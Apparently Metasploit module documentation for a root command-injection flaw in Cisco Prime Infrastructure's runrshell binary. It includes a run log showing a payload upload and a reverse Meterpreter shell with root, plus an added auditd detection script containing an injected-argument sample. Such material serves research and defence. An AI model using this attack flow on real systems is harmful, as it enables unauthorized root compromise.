Vulnerable Application
This module exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but extra commands can be injected into its argument, which allows arbitrary command execution as root. The vulnerability was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
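A detection-side sketch for the flaw described above, added here as an example and not part of the module or its documentation: it scans Linux auditd EXECVE records for runrshell invocations whose arguments carry shell metacharacters, including arguments auditd has hex-encoded. The sample records, the `/PLACEHOLDER` path, the script names and the metacharacter set are constructed assumptions.

```python
import re

# Assumption: any argv[0] whose basename is "runrshell" is the binary of interest.
TARGET = "runrshell"
# Separators, substitution and redirection characters a shell would interpret.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\\'\"#]")
# auditd writes safe arguments quoted (a1="x") and others as bare hex (a1=782E...).
ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|((?:[0-9A-Fa-f]{2})+))')

def decode_args(record):
    """Return argv from one EXECVE record, decoding hex-encoded values."""
    args = {}
    for idx, quoted, hexed in ARG.findall(record):
        if hexed:
            args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace")
        else:
            args[int(idx)] = quoted
    return [args[i] for i in sorted(args)]

def suspicious(record):
    """Return the runrshell arguments that contain shell metacharacters."""
    if "type=EXECVE" not in record:
        return []
    argv = decode_args(record)
    if not argv or argv[0].rsplit("/", 1)[-1] != TARGET:
        return []
    return [a for a in argv[1:] if SHELL_META.search(a)]

# Constructed sample records (not captured from a real host).
SAMPLE = [
    'type=EXECVE msg=audit(1560183400.101:901): argc=2 '
    'a0="/PLACEHOLDER/runrshell" a1="backup.sh"',
    # An argument with a space is hex-encoded by auditd, so build it that way.
    'type=EXECVE msg=audit(1560183493.220:902): argc=2 '
    'a0="/PLACEHOLDER/runrshell" a1=' + "x.sh; id".encode().hex().upper(),
    'type=EXECVE msg=audit(1560183499.004:903): argc=2 a0="/bin/ls" a1="-l"',
]

if __name__ == "__main__":
    for rec in SAMPLE:
        hits = suspicious(rec)
        if hits:
            print("ALERT runrshell argument with shell metacharacters:", hits)
```

Matching on the decoded value matters here: a filter that only inspects quoted arguments never sees the hex-encoded form auditd uses for values containing spaces.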
Scenarios
msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
[*] Started reverse TCP handler on 192.168.0.21:4444
[*] Uploading /tmp/mYVrqmsETa.bin
[*] chmod the file with +x
[*] Executing /tmp/mYVrqmsETa.bin
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
[+] Deleted /tmp/mYVrqmsETa.bin
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >